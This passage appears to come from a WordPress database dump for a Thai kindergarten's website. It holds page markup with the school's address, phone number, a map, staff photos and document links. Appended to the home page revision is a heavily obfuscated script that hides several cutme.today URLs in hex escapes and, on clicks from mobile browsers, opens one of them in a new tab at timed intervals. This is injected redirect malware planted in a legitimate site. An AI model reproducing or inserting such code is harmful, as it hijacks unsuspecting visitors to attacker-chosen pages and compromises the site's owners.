{\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-09-24 10:24:11','2024-09-24 03:24:11','',19,'http://watprato.ssk.in.th/?p=398',0,'revision','',0),
(400,2,'2024-09-24 10:27:25','2024-09-24 03:27:25','','รองผู้อำนวยการ2','','inherit','open','closed','','%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%ad%e0%b8%b3%e0%b8%99%e0%b8%a7%e0%b8%a2%e0%b8%81%e0%b8%b2%e0%b8%a32','','','2024-09-24 10:27:25','2024-09-24 03:27:25','',19,'http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2.jpg',0,'attachment','image/jpeg',0),
(401,2,'2024-09-24 10:31:11','2024-09-24 03:31:11','','รองผู้อำนวยการ3','','inherit','open','closed','','%e0%b8%a3%e0%b8%ad%e0%b8%87%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%ad%e0%b8%b3%e0%b8%99%e0%b8%a7%e0%b8%a2%e0%b8%81%e0%b8%b2%e0%b8%a33','','','2024-09-24 10:31:11','2024-09-24 03:31:11','',19,'http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg',0,'attachment','image/jpeg',0),
(402,2,'2024-09-24 10:31:51','2024-09-24 03:31:51','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":5,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:image {\"id\":397,\"width\":\"253px\",\"height\":\"auto\",\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large is-resized\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/นางรำไพ-อดทน-12.5x16-cm-800x1024.png\" alt=\"\" class=\"wp-image-397\" style=\"width:253px;height:auto\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li 